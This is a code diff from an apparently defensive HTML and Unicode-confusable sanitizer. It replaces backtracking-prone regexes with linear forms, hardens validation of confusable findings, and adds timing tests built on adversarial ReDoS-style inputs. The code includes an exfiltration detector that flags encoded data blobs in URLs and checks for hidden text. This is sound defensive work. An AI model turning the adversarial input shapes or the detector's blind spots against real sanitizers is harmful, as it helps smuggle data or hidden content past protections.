+    resolution: {integrity: sha512-1wp/eiLxcjC/Ex4wurlrS/LGzt8IiF4TiK5sEjldu4HVAKdNCnnmsS9a5vFpfcikDz4ZuZlLlTi1VbQTxHlwZg==}
+    cpu: [x64]
+    os: [darwin]
+
+  recheck-windows-x64@4.5.0:
+    resolution: {integrity: sha512-ekBKwAp0oKkMULn5zgmHEYLwSJfkfb95AbTtbDkQazNkqYw9PRD/mVyFUR6Ff2IeRyZI0gxy+N2AKBISWydhug==}
+    cpu: [x64]
+    os: [win32]
+
+  recheck@4.5.0:
+    resolution: {integrity: sha512-kPnbOV6Zfx9a25AZ++28fI1q78L/UVRQmmuazwVRPfiiqpMs+WbOU69Shx820XgfKWfak0JH75PUvZMFtRGSsw==}
+    engines: {node: '>=20'}
+
   rehype-parse@9.0.1:
     resolution: {integrity: sha512-ksCzCD0Fgfh7trPDxr2rSylbwq9iYDkSn8TCDmEJ49ljEUBxDVCzCHv7QNzZOfODanX4+bWQ4WZqLCRWYLfhag==}
 
@@ -1925,6 +1965,10 @@ packages:
   supports-color@7.2.0:
     resolution: {integrity: sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==}
     engines: {node: '>=8'}
+
+  synckit@0.9.2:
+    resolution: {integrity: sha512-vrozgXDQwYO72vHjUb/HnFbQx1exDjoKzqx23aXEg2a9VIg2TSFZ8FmeZpTjUCFMYw7mpX4BE2SFu8wI7asYsw==}
+    engines: {node: ^14.18.0 || >=16.0.0}
 
   tap-parser@17.0.0:
     resolution: {integrity: sha512-Na7kB4ML7T77abJtYIlXh/aJcz54Azv0iAtOaDnLqsL4uWjU40uNFIFnZ5IvnGTuCIk5M6vjx7ZsceNGc1mcag==}
@@ -2752,6 +2796,8 @@ snapshots:
   '@oven/bun-windows-x64@1.3.11':
     optional: true
 
+  '@pkgr/core@0.1.2': {}
+
   '@sec-ant/readable-stream@0.4.1': {}
 
   '@simple-libs/child-process-utils@2.0.0':
@@ -3221,6 +3267,11 @@ snapshots:
   escape-string-regexp@4.0.0: {}
 
   escape-string-regexp@5.0.0: {}
+
+  eslint-plugin-redos@4.5.0(eslint@10.4.0(jiti@2.6.1)):
+    dependencies:
+      eslint: 10.4.0(jiti@2.6.1)
+      recheck: 4.5.0
 
   eslint-scope@9.1.2:
     dependencies:
@@ -3970,6 +4021,31 @@ snapshots:
       es-define-property: 1.0.1
       side-channel: 1.1.1
 
+  recheck-jar@4.5.0:
+    optional: true
+
+  recheck-linux-x64@4.5.0:
+    optional: true
+
+  recheck-macos-arm64@4.5.0:
+    optional: true
+
+  recheck-macos-x64@4.5.0:
+    optional: true
+
+  recheck-windows-x64@4.5.0:
+    optional: true
+
+  recheck@4.5.0:
+    dependencies:
+      synckit: 0.9.2
+    optionalDependencies:
+      recheck-jar: 4.5.0
+      recheck-linux-x64: 4.5.0
+      recheck-macos-arm64: 4.5.0
+      recheck-macos-x64: 4.5.0
+      recheck-windows-x64: 4.5.0
+
   rehype-parse@9.0.1:
     dependencies:
       '@types/hast': 3.0.5
@@ -4098,6 +4174,11 @@ snapshots:
   supports-color@7.2.0:
     dependencies:
       has-flag: 4.0.0
+
+  synckit@0.9.2:
+    dependencies:
+      '@pkgr/core': 0.1.2
+      tslib: 2.8.1
 
   tap-parser@17.0.0:
     dependencies:

--- a/src/confusables.mjs
+++ b/src/confusables.mjs
@@ -208,13 +208,11 @@ function describeFolds(findings) {
  * @returns {void}
  */
 function assertFinding(finding, actual) {
-  // Fail loud on a finding that does not match the actual bytes at its offset:
-  // a buggy/adversarial scanner reporting a wrong char/index would otherwise
-  // silently corrupt the path/command, defeating the deny-rule protection.
-  // A negative index is the gap the startsWith guard alone misses: when `char`
-  // is a prefix of the text, `startsWith(char, -1)` is true (the offset is
-  // clamped to 0), and the slice math below then mangles the string instead of
-  // throwing — so range-check the index explicitly first.
+  // A negative index is the gap the byte check alone misses: `String.slice`
+  // reads a negative offset from the END, so `actual` can be a genuine match
+  // taken from the wrong place — `{index: -2, char: "а"}` against `"aаb"`
+  // matches, and the splice math then folds a byte the finding never named.
+  // Range-check the index explicitly first.
   if (!Number.isInteger(finding.index) || finding.index < 0)
     throw new Error(
       `Confusable finding has an out-of-range index ${finding.index}`,
@@ -355,10 +353,15 @@ export function selectFoldableFindings(text, findings) {
 
   // Every offset the finding covers, not just its first: `char` may span a
   // boundary into a token the gate rejected, and folding it would rewrite that
-  // token — the exact mangling this gate exists to prevent.
-  return findings.filter((finding) =>
-    [...finding.char].every((_, i) => foldableAt[finding.index + i] === 1),
-  );
+  // token — the exact mangling this gate exists to prevent. Counted in UTF-16
+  // units, which is what `foldableAt` is indexed by: an astral glyph occupies
+  // two of them, so a code-point walk would leave the tail of a `char` that
+  // carries one unchecked.
+  return findings.filter((finding) => {
+    for (let i = 0; i < finding.char.length; i++)
+      if (foldableAt[finding.index + i] !== 1) return false;
+    return true;
+  });
 }
 
 /**

--- a/src/confusables.mjs
+++ b/src/confusables.mjs
@@ -403,7 +403,7 @@ export function foldConfusables(text, findings) {
     tail.push(finding.latinEquivalent);
     cursor = finding.index;
   }
-  return text.slice(0, cursor) + [...tail].reverse().join("");
+  return text.slice(0, cursor) + tail.reverse().join("");
 }
 
 /**

--- a/src/confusables.mjs
+++ b/src/confusables.mjs
@@ -198,14 +198,16 @@ function describeFolds(findings) {
 
 /**
  * Reject a finding that does not describe a real, foldable glyph at its reported
- * offset in `text`. Every consumer of a scanner finding runs this BEFORE acting
- * on it, so a buggy or adversarial scanner fails loud instead of silently
- * corrupting (or silently escaping the fold gate in) a path/command.
- * @param {string} text
+ * offset. Every consumer of a scanner finding runs this BEFORE acting on it, so
+ * a buggy or adversarial scanner fails loud instead of silently corrupting (or
+ * silently escaping the fold gate in) a path/command. `actual` is the bytes that
+ * sit at `finding.index` right now — from the input for an untouched region,
+ * from the folded output for one the caller has already rewritten.
  * @param {{ index: number, char: string, latinEquivalent: string }} finding
+ * @param {string} actual
  * @returns {void}
  */
-function assertFinding(text, finding) {
+function assertFinding(finding, actual) {
   // Fail loud on a finding that does not match the actual bytes at its offset:
   // a buggy/adversarial scanner reporting a wrong char/index would otherwise
   // silently corrupt the path/command, defeating the deny-rule protection.
@@ -235,7 +237,7 @@ function assertFinding(text, finding) {
     throw new Error(
       `Confusable finding at index ${finding.index} names an ASCII char ${JSON.stringify(finding.char)}`,
     );
-  if (!text.startsWith(finding.char, finding.index))
+  if (!actual.startsWith(finding.char))
     throw new Error(
       `Confusable finding does not match input at index ${finding.index}: expected ${JSON.stringify(finding.char)}`,
     );
@@ -262,6 +264,17 @@ function assertFinding(text, finding) {
           finding.latinEquivalent,
         )} is not ASCII`,
       );
+}
+
+/**
+ * The bytes `finding.char` claims to sit on, read from `text`. Bounded to the
+ * glyph's own length so validating a finding never copies the rest of the input.
+ * @param {string} text
+ * @param {{ index: number, char: string }} finding
+ * @returns {string}
+ */
+function bytesAt(text, finding) {
+  return text.slice(finding.index, finding.index + finding.char.length);
 }
 
 /**
@@ -295,7 +308,8 @@ function isTokenBoundary(ch) {
  * @returns {Array<{ index: number, char: string, latinEquivalent: string }>}
  */
 export function selectFoldableFindings(text, findings) {
-  for (const finding of findings) assertFinding(text, finding);
+  for (const finding of findings)
+    assertFinding(finding, bytesAt(text, finding));
 
   // Every UTF-16 offset a finding covers, not just its start: a scanner is free
   // to report a multi-code-point match, and treating only the first offset as
@@ -365,7 +379,6 @@ export function foldConfusables(text, findings) {
   /** @type {string[]} */
   const tail = [];
   let cursor = text.length;
-  const rebuild = () => [...tail].reverse().join("");
   for (const finding of [...findings].sort(
     (lhs, rhs) => rhs.index - lhs.index,
   )) {
@@ -374,21 +387,53 @@ export function foldConfusables(text, findings) {
     // a glyph that is not there fails loud. Highest-index-first leaves every
     // offset below `cursor` byte-identical to `text`, so a finding ending there
     // is checked against `text` itself; one reaching PAST `cursor` overlaps a
-    // fold already applied, and only the rebuilt tail carries the bytes it now
-    // sits on.
+    // fold already applied, and only the folded bytes carry what it now sits on.
     if (end <= cursor) {
-      assertFinding(text, finding);
+      assertFinding(finding, bytesAt(text, finding));
       tail.push(text.slice(end, cursor));
     } else {
-      const folded = rebuild();
-      assertFinding(text.slice(0, cursor) + folded, finding);
-      tail.length = 0;
-      tail.push(folded.slice(end - cursor));
+      // The overlap reaches at most `char.length` past `cursor`, and those bytes
+      // are the ones pushed most recently, so take them off the tail instead of
+      // re-joining all of it — a whole-tail rebuild per overlapping finding is
+      // the O(findings x length) cost this assembly exists to avoid. Consuming
+      // them is also what the fold means: `char` replaces those bytes.
+      const overlap = takeFromTail(tail, end - cursor);
+      assertFinding(finding, text.slice(finding.index, cursor) + overlap);
     }
     tail.push(finding.latinEquivalent);
     cursor = finding.index;
   }
-  return text.slice(0, cursor) + rebuild();
+  return text.slice(0, cursor) + [...tail].reverse().join("");
+}
+
+/**
+ * Remove and return the first `count` characters of the folded tail. The tail is
+ * stored back-to-front, so its lowest-offset bytes are the entries pushed most
+ * recently and popping walks them in reading order; a partially consumed entry
+ * is pushed back minus what was taken.
+ * @param {string[]} tail
+ * @param {number} count
+ * @returns {string}
+ */
+function takeFromTail(tail, count) {
+  /** @type {string[]} */
+  const taken = [];
+  let remaining = count;
+  while (remaining > 0) {
+    const entry = tail.pop();
+    // A tail shorter than `count` means the finding claims bytes past the end of
+    // the folded text — a mismatching finding, which the caller's assertion
+    // rejects by name once it sees the short result. Stop rather than pretend.
+    if (entry === undefined) break;
+    if (entry.length > remaining) {
+      taken.push(entry.slice(0, remaining));
+      tail.push(entry.slice(remaining));
+      break;
+    }
+    taken.push(entry);
+    remaining -= entry.length;
+  }
+  return taken.join("");
 }
 
 /**

--- a/src/html.mjs
+++ b/src/html.mjs
@@ -590,14 +590,15 @@ function hexByte(n) {
  * clamps out-of-range) or a percentage `0%..100%` scaled to `0..255`. Returns
  * null (fail open) on any other shape — a `none`/`calc()`/negative channel we
  * cannot resolve to a concrete byte.
+ *
+ * The number shape here (and in `hueDegrees`/`hslPercent`) spells the integer
+ * and leading-`.` forms as disjoint alternatives rather than `\d*\.?\d+`: the
+ * latter's `\d*` and `\d+` both match a digit, so every split of a long digit
+ * run is retried against the rest of the pattern and a failing token costs
+ * O(n^2). Disjoint arms fail each backtrack step in constant time.
  * @param {string} token
  * @returns {number | null}
  */
-// The number shape below (and in `hueDegrees`/`hslPercent`) spells the integer
-// and leading-`.` forms as disjoint alternatives rather than `\d*\.?\d+`: the
-// latter's `\d*` and `\d+` both match a digit, so every split of a long digit
-// run is retried against the rest of the pattern and a failing token costs
-// O(n^2). Disjoint arms fail each backtrack step in constant time.
 function rgbChannel(token) {
   const pct = token.match(/^\+?(\d+(?:\.\d+)?|\.\d+)%$/);
   if (pct) return (Math.min(100, parseFloat(pct[1])) / 100) * 255;
@@ -2522,7 +2523,10 @@ const BLOB_VALUE_B64URL_RE = /^[A-Za-z0-9_-]{40,}={0,2}$/;
  * character mix that separates bulk-encoded bytes from a lowercase word-slug.
  * Two single-character-class scans rather than one `(?=.*[A-Z])(?=.*[0-9])`
  * regex: an unanchored lookahead pair costs a full scan at EVERY start offset,
- * so a long value that carries neither class is quadratic to reject.
+ * so a long value that carries neither class is quadratic to reject. The two
+ * agree on any value without a newline, which every caller guarantees by
+ * gating on an anchored pattern over a newline-free alphabet first — `.` in
+ * that lookahead does not cross a line, so only there could they differ.
  * @param {string} value
  * @returns {boolean}
  */

--- a/src/html.mjs
+++ b/src/html.mjs
@@ -593,10 +593,15 @@ function hexByte(n) {
  * @param {string} token
  * @returns {number | null}
  */
+// The number shape below (and in `hueDegrees`/`hslPercent`) spells the integer
+// and leading-`.` forms as disjoint alternatives rather than `\d*\.?\d+`: the
+// latter's `\d*` and `\d+` both match a digit, so every split of a long digit
+// run is retried against the rest of the pattern and a failing token costs
+// O(n^2). Disjoint arms fail each backtrack step in constant time.
 function rgbChannel(token) {
-  const pct = token.match(/^\+?(\d*\.?\d+)%$/);
+  const pct = token.match(/^\+?(\d+(?:\.\d+)?|\.\d+)%$/);
   if (pct) return (Math.min(100, parseFloat(pct[1])) / 100) * 255;
-  const num = token.match(/^\+?(\d*\.?\d+)$/);
+  const num = token.match(/^\+?(\d+(?:\.\d+)?|\.\d+)$/);
   if (num) return parseFloat(num[1]);
   return null;
 }
@@ -608,7 +613,9 @@ function rgbChannel(token) {
  * @returns {number | null}
  */
 function hueDegrees(token) {
-  const match = token.match(/^([+-]?\d*\.?\d+)(deg|grad|rad|turn)?$/);
+  const match = token.match(
+    /^([+-]?(?:\d+(?:\.\d+)?|\.\d+))(deg|grad|rad|turn)?$/,
+  );
   if (!match) return null;
   const value = parseFloat(match[1]);
   const unit = match[2] || "deg";
@@ -630,7 +637,7 @@ function hueDegrees(token) {
  * @returns {number | null}
  */
 function hslPercent(token) {
-  const match = token.match(/^\+?(\d*\.?\d+)%?$/);
+  const match = token.match(/^\+?(\d+(?:\.\d+)?|\.\d+)%?$/);
   return match ? Math.min(100, parseFloat(match[1])) : null;
 }
 
@@ -688,7 +695,11 @@ function canonicalizeColorFunction(value) {
   }
   // A literal-zero alpha is fully transparent — bare number (`0`, `0.0`) or the
   // CSS Color 4 percentage form (`0%`), which a browser also renders invisible.
-  if (alpha !== null && /^\+?0*\.?0+%?$/.test(alpha)) return "transparent";
+  // Disjoint arms for the same reason the channel patterns above carry them:
+  // `0*` and `0+` both match a zero, so a long run of them would be retried at
+  // every split before the match could fail.
+  if (alpha !== null && /^\+?(?:0+(?:\.0+)?|\.0+)%?$/.test(alpha))
+    return "transparent";
   if (parts.length !== 3) return null;
   if (isRgb) {
     const channels = parts.map(rgbChannel);
@@ -1806,7 +1817,11 @@ const BOGUS_COMMENT_OPEN_RE = /<[!?]/g;
 // html-property "second pass changes nothing"). An open/end tag requires a
 // name letter after the `<`/`</`, so literal prose like `a < b` or an `i <3 u`
 // emoticon is not mistaken for markup.
-const UNTERMINATED_MARKUP_TAIL_RE = /<(?:[!?]|\/?[a-zA-Z])[^>]*$/;
+// Matched against the slice after the last `>` rather than as a `[^>]*$` tail:
+// the tail form has to rescan to end-of-input from every `<` in the source, so
+// a document of many `<` and no `>` costs O(n^2). This form is fixed-length, so
+// each start offset is constant.
+const MARKUP_OPENER_RE = /<(?:[!?]|\/?[a-zA-Z])/;
 
 /**
  * Fold a raw source slice into the "inside an unterminated tag" state. A `>`
@@ -1820,8 +1835,10 @@ const UNTERMINATED_MARKUP_TAIL_RE = /<(?:[!?]|\/?[a-zA-Z])[^>]*$/;
  * @returns {boolean}
  */
 function foldAbsorb(absorbing, raw) {
-  if (raw.includes(">")) return UNTERMINATED_MARKUP_TAIL_RE.test(raw);
-  return absorbing || UNTERMINATED_MARKUP_TAIL_RE.test(raw);
+  const lastClose = raw.lastIndexOf(">");
+  const opensMarkup = MARKUP_OPENER_RE.test(raw.slice(lastClose + 1));
+  if (lastClose !== -1) return opensMarkup;
+  return absorbing || opensMarkup;
 }
 
 /**
@@ -2499,7 +2516,19 @@ const DIGEST_HEX_LENGTHS = new Set([32, 40, 56, 64, 96, 128]);
 // the slug benign (no uppercase) while catching the scattered-separator blob the
 // run gate missed. Anchored to the whole value for the same RAW-query reason.
 const BLOB_VALUE_B64URL_RE = /^[A-Za-z0-9_-]{40,}={0,2}$/;
-const B64URL_MIXED_RE = /(?=.*[A-Z])(?=.*[0-9])/;
+
+/**
+ * True when `value` carries at least one uppercase letter AND one digit — the
+ * character mix that separates bulk-encoded bytes from a lowercase word-slug.
+ * Two single-character-class scans rather than one `(?=.*[A-Z])(?=.*[0-9])`
+ * regex: an unanchored lookahead pair costs a full scan at EVERY start offset,
+ * so a long value that carries neither class is quadratic to reject.
+ * @param {string} value
+ * @returns {boolean}
+ */
+function hasUpperAndDigit(value) {
+  return /[A-Z]/.test(value) && /[0-9]/.test(value);
+}
 
 // A path segment whose whole value is a base64/hex run longer than any standard
 // content hash (SHA-512 hex is 128, base64 88; SHA-256 hex 64) is bulk encoded
@@ -2510,6 +2539,8 @@ const B64URL_MIXED_RE = /(?=.*[A-Z])(?=.*[0-9])/;
 // standard arm so a long word-slug (`the-secret-history-of-…`) is not mistaken
 // for a payload; the url-safe arm re-admits `-`/`_` but, like the query arm
 // above, gates on a contiguous 40+ alphanumeric run to keep the slug benign.
+// The two arms overlap on `[A-Fa-f0-9]` but stay linear: `={0,2}$` fails in
+// constant time after the first giveback, so each arm costs one pass.
 const PATH_BLOB_RE = /^(?:[A-Za-z0-9+/]+={0,2}|[A-Fa-f0-9]+)$/;
 // SHA-512 is 128 hex characters and no standard digest is longer, so a run past
 // this is bulk encoded data rather than any fingerprint. Shared by the two path
@@ -2526,7 +2557,7 @@ const DIGEST_MAX_LEN = 128;
  * @returns {boolean}
  */
 function isBase64UrlBlob(value) {
-  return BLOB_VALUE_B64URL_RE.test(value) && B64URL_MIXED_RE.test(value);
+  return BLOB_VALUE_B64URL_RE.test(value) && hasUpperAndDigit(value);
 }
 
 // `.` and `,` are legal in a URL but sit outside every blob alphabet above, so
@@ -2570,7 +2601,7 @@ function isChunkedPathBlob(segment) {
   return (
     joined !== null &&
     joined.length > DIGEST_MAX_LEN &&
-    ((PATH_BLOB_RE.test(joined) && B64URL_MIXED_RE.test(joined)) ||
+    ((PATH_BLOB_RE.test(joined) && hasUpperAndDigit(joined)) ||
       isBase64UrlBlob(joined))
   );
 }
@@ -2968,7 +2999,12 @@ function parseSrcset(value) {
     const start = i;
     while (i < n && !SRCSET_WS_RE.test(value[i])) i++;
     const run = value.slice(start, i);
-    const url = run.replace(/,+$/, "");
+    // The trailing commas come off by scanning back rather than by replacing
+    // `,+$`: that pattern is unanchored at the start, so a run of commas costs
+    // one match attempt per comma.
+    let cut = run.length;
+    while (cut > 0 && run[cut - 1] === ",") cut--;
+    const url = run.slice(0, cut);
     if (url) urls.push(url);
     // A URL run ending in a comma is a bare candidate (no descriptor); the
     // comma already delimits the next one, so skip descriptor parsing.

--- a/test/algorithmic-complexity.test.mjs
+++ b/test/algorithmic-complexity.test.mjs
@@ -15,23 +15,17 @@
  * Neither is visible to a pattern analyzer, and the correctness suites are
  * indifferent to cost, so the only thing that catches them is measuring. Each
  * case below runs one entry point over an adversarial input at two sizes 8x
- * apart and asserts the cost grew like the input, not like its square. Ratios,
- * not milliseconds: machine speed and the coverage instrumentation scale both
- * sides (see `test/helpers/cpu-timing.mjs`).
+ * apart and asserts the cost grew like the input, not like its square — a ratio
+ * rather than a millisecond count, so machine speed and the coverage
+ * instrumentation scale both sides (see `test/helpers/cpu-timing.mjs`).
  *
- * Every shape here reads 5-11x on the implementations that ship. Two of them
- * read 64.0x and 61.1x against the implementations they were written for — the
- * `(?=.*[A-Z])(?=.*[0-9])` mix test on a long lowercase path segment, and a
- * `\d*\.?\d+` channel token on a long digit run — and the overlapping fold read
- * 27.1x against a whole-output rebuild per finding. {@link GROWTH_LIMIT} sits
- * between those two populations.
- *
- * The `sanitizeHtml` case is the one whose defect it does NOT demonstrate: the
- * markup-tail rescan it targets reads 11.3x either way, because parse5 dominates
- * a document this size and the tail the analysis sees is one node's raw source
- * rather than the whole input. It stays as a growth gate on the Layer-2 entry
- * point — a tail scan that went quadratic over a single large node would clear
- * the limit several times over — not as evidence of a defect caught.
+ * Every shape here reads 5-11x on the implementations that ship, and three read
+ * 64.0x, 61.1x and 27.1x against the ones they were written for;
+ * {@link GROWTH_LIMIT} sits between those two populations. `sanitizeHtml` is the
+ * exception: the `[^>]*$` tail reads 10.2x against 8.8x, because the document
+ * parse costs as much again as the rescan at BOTH sizes and pulls the blended
+ * ratio back toward linear. It is a growth gate on the Layer-2 entry point, not
+ * evidence of a defect caught.
  */
 import { describe, it, before } from "node:test";
 import assert from "node:assert/strict";
@@ -45,6 +39,7 @@ import {
   grow,
   measure,
   measurePerCall,
+  timed,
 } from "./helpers/cpu-timing.mjs";
 
 const KB = 1024;
@@ -53,13 +48,15 @@ const LARGE = 64 * KB;
 
 /**
  * LARGE is 8x SMALL, so a linear cost grows 8x and a quadratic one 64x. The
- * limit sits at three times linear: wide enough that a `n log n` pass, a
- * collector run landing on the large side, or a per-call constant that only the
- * small side amortizes cannot manufacture a failure, and far enough under 64x
- * that no quadratic reaches it. Both sides are measured in one process on one
+ * limit sits at 2.5x linear: wide enough that a `n log n` pass, a collector run
+ * landing on the large side, or a per-call constant that only the small side
+ * amortizes cannot manufacture a failure, and clear of the WEAKEST defect this
+ * file has measured (27.1x, the per-finding rebuild) rather than merely of the
+ * 64x an undiluted quadratic reads — a limit calibrated on the loud defects
+ * would sit above the quiet one. Both sides are measured in one process on one
  * machine, so nothing here needs headroom for machine speed.
  */
-const GROWTH_LIMIT = 24;
+const GROWTH_LIMIT = 20;
 
 const CYR_A = "а";
 
@@ -83,16 +80,27 @@ const lowercaseBlobPath = (n) => `https://e.com/${grow("abcdefg-", n)}`;
 const mixedBlobPath = (n) => `https://e.com/${grow("aB3defg-", n)}`;
 
 /**
- * One paragraph of prose carrying many `<` and no `>`. The markup-tail analysis
- * runs over a node's whole raw source, so this has to be ONE node: split into
- * paragraphs, each slice is short and no per-offset rescan can show. The comment
- * gives the document something to remove, so the pipeline runs to the end rather
- * than answering null.
+ * Many tag openers, then one `>`, then a hidden span, all in one paragraph.
+ * Every part is load-bearing, and getting any of them wrong makes the case
+ * measure nothing:
+ *
+ * - the opener is `<` plus a name letter, or the tail test declines it in
+ *   constant time (`<` plus a space is the trap: it looks adversarial and is
+ *   answered instantly);
+ * - the `!` keeps each opener from being a well-formed tag, which is what leaves
+ *   the whole run inside ONE inter-node raw slice — with `<ab ` openers the
+ *   final `<ab >` parses as an html node of its own and the slice handed to the
+ *   fold ends before the `>`, where the tail test answers in constant time;
+ * - the span is a real inline-html child, and the openers are the raw source
+ *   BETWEEN nodes, which is the slice the absorb state is folded over. Without
+ *   a child the document has no inline html and the fold never runs;
+ * - the paragraph opens with prose, or the run is block-level html and the
+ *   inline walk that folds the absorb state is never entered.
  * @param {number} n
  * @returns {string}
  */
-const openAngleProse = (n) =>
-  `<!--c-->\n\n<p>ok</p>\n\n${grow("a < b < c ", n)}`;
+const unterminatedOpeners = (n) =>
+  `hi ${grow("<a! ", n)}><span style="display:none">x</span>`;
 
 /**
  * A CSS color channel that is one long run of digits — the shape that makes a
@@ -103,7 +111,12 @@ const openAngleProse = (n) =>
  * @param {number} n
  * @returns {string}
  */
-const digitChannel = (n) => `color: rgb(${grow("9", n)}, 0, 0)`;
+const digitChannel = (n) => {
+  const huge = grow("9", n);
+  // Every channel out of range clamps to 255, so the declaration resolves to
+  // white on white — a verdict only reachable if the long token was READ.
+  return `color: rgb(${huge},${huge},${huge}); background: rgb(255,255,255)`;
+};
 
 /**
  * Text of paired Cyrillic look-alikes, and findings that all OVERLAP a fold
@@ -160,20 +173,23 @@ const CASES = {
         "encoded data blob in path segment" &&
       checkExfilUrl(lowercaseBlobPath(LARGE)) === null,
   },
-  "sanitizeHtml/open-angle-prose": {
-    input: (size, attempt) => openAngleProse(size - attempt),
+  "sanitizeHtml/unterminated-openers": {
+    input: (size, attempt) => unterminatedOpeners(size - attempt),
     run: (text) => sanitizeHtml(text),
-    // A document with no HTML tag is answered with null before any analysis
-    // runs, so the `<p>` this shape carries is load-bearing.
-    marker: () => sanitizeHtml(openAngleProse(512)) !== null,
+    // The hidden span is removed, which only happens once the walk has reached
+    // an inline-html child — and reaching one is what folds the absorb state
+    // over the openers before it. A document answered null, or one whose span
+    // survived, would be timing a walk that never got there.
+    marker: () =>
+      sanitizeHtml(unterminatedOpeners(LARGE))?.removed.hidden === 1,
   },
   "isHiddenStyle/digit-channel": {
     input: (size, attempt) => digitChannel(size - attempt),
     run: (style) => isHiddenStyle(style),
-    // White on white is the verdict the channel parser exists to reach, so a
-    // true here proves the tokens are being resolved rather than declined.
-    marker: () =>
-      isHiddenStyle("color: rgb(255, 255, 255); background: rgb(255,255,255)"),
+    // On the measured input at the measured size, not a comfortable stand-in: a
+    // length cap added to the declaration parser would leave a short marker
+    // green while the timing quietly moved to an early bail.
+    marker: () => isHiddenStyle(digitChannel(LARGE)),
   },
   "foldConfusables/overlapping-findings": {
     input: (size, attempt) => overlappingFolds(size - attempt),
@@ -241,18 +257,6 @@ before(
   // under it.
   { timeout: 300_000 },
 );
-
-/** An `it` whose verdict rests on the timings, and so has none under Stryker.
- * @param {string} name
- * @param {(t: import("node:test").TestContext) => void} fn */
-const timed = (name, fn) =>
-  it(name, (t) => {
-    if (MUTATION_RUN) {
-      t.skip(MUTATION_RUN);
-      return;
-    }
-    fn(t);
-  });
 
 describe("algorithmic complexity", () => {
   for (const [name, { marker }] of Object.entries(CASES))

--- a/test/algorithmic-complexity.test.mjs
+++ b/test/algorithmic-complexity.test.mjs
@@ -1,0 +1,290 @@
+/**
+ * The empirical half of the linear-time guarantee (see THREAT-MODEL.md).
+ *
+ * The static gates — `tests/test_redos_js_static_guard.py` over every shipped
+ * JS pattern, and its Python twin — prove no regex here backtracks
+ * super-linearly WITHIN one match attempt. They are structurally blind to two
+ * other ways this code can go quadratic, and both have shipped:
+ *
+ *   - an UNANCHORED pattern retried at every start offset, each attempt linear
+ *     and none of them backtracking: `(?=.*[A-Z])(?=.*[0-9])` against a long
+ *     value carrying neither class, or a `[^>]*$` tail rescanned from every `<`;
+ *   - work that is not a regex at all: a string rebuilt once per finding, a
+ *     prefix re-sliced inside a loop, a re-walk of an already-walked tree.
+ *
+ * Neither is visible to a pattern analyzer, and the correctness suites are
+ * indifferent to cost, so the only thing that catches them is measuring. Each
+ * case below runs one entry point over an adversarial input at two sizes 8x
+ * apart and asserts the cost grew like the input, not like its square. Ratios,
+ * not milliseconds: machine speed and the coverage instrumentation scale both
+ * sides (see `test/helpers/cpu-timing.mjs`).
+ *
+ * Every shape here reads 5-11x on the implementations that ship. Two of them
+ * read 64.0x and 61.1x against the implementations they were written for — the
+ * `(?=.*[A-Z])(?=.*[0-9])` mix test on a long lowercase path segment, and a
+ * `\d*\.?\d+` channel token on a long digit run — and the overlapping fold read
+ * 27.1x against a whole-output rebuild per finding. {@link GROWTH_LIMIT} sits
+ * between those two populations.
+ *
+ * The `sanitizeHtml` case is the one whose defect it does NOT demonstrate: the
+ * markup-tail rescan it targets reads 11.3x either way, because parse5 dominates
+ * a document this size and the tail the analysis sees is one node's raw source
+ * rather than the whole input. It stays as a growth gate on the Layer-2 entry
+ * point — a tail scan that went quadratic over a single large node would clear
+ * the limit several times over — not as evidence of a defect caught.
+ */
+import { describe, it, before } from "node:test";
+import assert from "node:assert/strict";
+
+import { checkExfilUrl, isHiddenStyle, sanitizeHtml } from "../src/html.mjs";
+import { foldConfusables } from "../src/confusables.mjs";
+import {
+  MUTATION_RUN,
+  RESOLUTION_CEILING_MS,
+  clockResolutionMs,
+  grow,
+  measure,
+  measurePerCall,
+} from "./helpers/cpu-timing.mjs";
+
+const KB = 1024;
+const SMALL = 8 * KB;
+const LARGE = 64 * KB;
+
+/**
+ * LARGE is 8x SMALL, so a linear cost grows 8x and a quadratic one 64x. The
+ * limit sits at three times linear: wide enough that a `n log n` pass, a
+ * collector run landing on the large side, or a per-call constant that only the
+ * small side amortizes cannot manufacture a failure, and far enough under 64x
+ * that no quadratic reaches it. Both sides are measured in one process on one
+ * machine, so nothing here needs headroom for machine speed.
+ */
+const GROWTH_LIMIT = 24;
+
+const CYR_A = "а";
+
+/**
+ * A path segment the blob detector must read all the way to the end before it
+ * can call the value benign: every character is lowercase, so the mix test that
+ * separates bulk-encoded bytes from a word-slug finds neither the uppercase nor
+ * the digit it looks for. The hyphens are what make it reach that test at all —
+ * they are outside the standard-base64 and hex alphabets, so the cheaper
+ * whole-segment patterns decline first and only the url-safe arm is left.
+ *
+ * The PATH, not a query value: a query this long is answered "unusually long
+ * query string" before any per-value analysis, so the query route cannot reach
+ * the mix test at any size that would show a cost curve.
+ * @param {number} n
+ * @returns {string}
+ */
+const lowercaseBlobPath = (n) => `https://e.com/${grow("abcdefg-", n)}`;
+
+/** The same segment WITH the character mix, which the detector reports. */
+const mixedBlobPath = (n) => `https://e.com/${grow("aB3defg-", n)}`;
+
+/**
+ * One paragraph of prose carrying many `<` and no `>`. The markup-tail analysis
+ * runs over a node's whole raw source, so this has to be ONE node: split into
+ * paragraphs, each slice is short and no per-offset rescan can show. The comment
+ * gives the document something to remove, so the pipeline runs to the end rather
+ * than answering null.
+ * @param {number} n
+ * @returns {string}
+ */
+const openAngleProse = (n) =>
+  `<!--c-->\n\n<p>ok</p>\n\n${grow("a < b < c ", n)}`;
+
+/**
+ * A CSS color channel that is one long run of digits — the shape that makes a
+ * `\d*\.?\d+` token pattern retry every split of the run before it can fail.
+ * Read through the style test directly: an inline style reaches the channel
+ * parser only after a parse of the whole document, which would dominate the
+ * measurement with parse5's cost rather than the token scan's.
+ * @param {number} n
+ * @returns {string}
+ */
+const digitChannel = (n) => `color: rgb(${grow("9", n)}, 0, 0)`;
+
+/**
+ * Text of paired Cyrillic look-alikes, and findings that all OVERLAP a fold
+ * already applied: the second glyph of each pair folds first, and the finding on
+ * the first glyph then covers a byte that fold rewrote. That is the branch that
+ * has to read back into the folded output, and the one a whole-output rebuild
+ * per finding turns quadratic. An honest scanner does not emit these — an
+ * adversarial one is free to, and the fold validates rather than trusts them.
+ * @param {number} n
+ * @returns {{ text: string, findings: Array<{index: number, char: string, latinEquivalent: string}> }}
+ */
+function overlappingFolds(n) {
+  const text = grow(CYR_A + CYR_A, n);
+  const findings = [];
+  for (let i = 0; i + 1 < text.length; i += 2) {
+    findings.push({ index: i + 1, char: CYR_A, latinEquivalent: "a" });
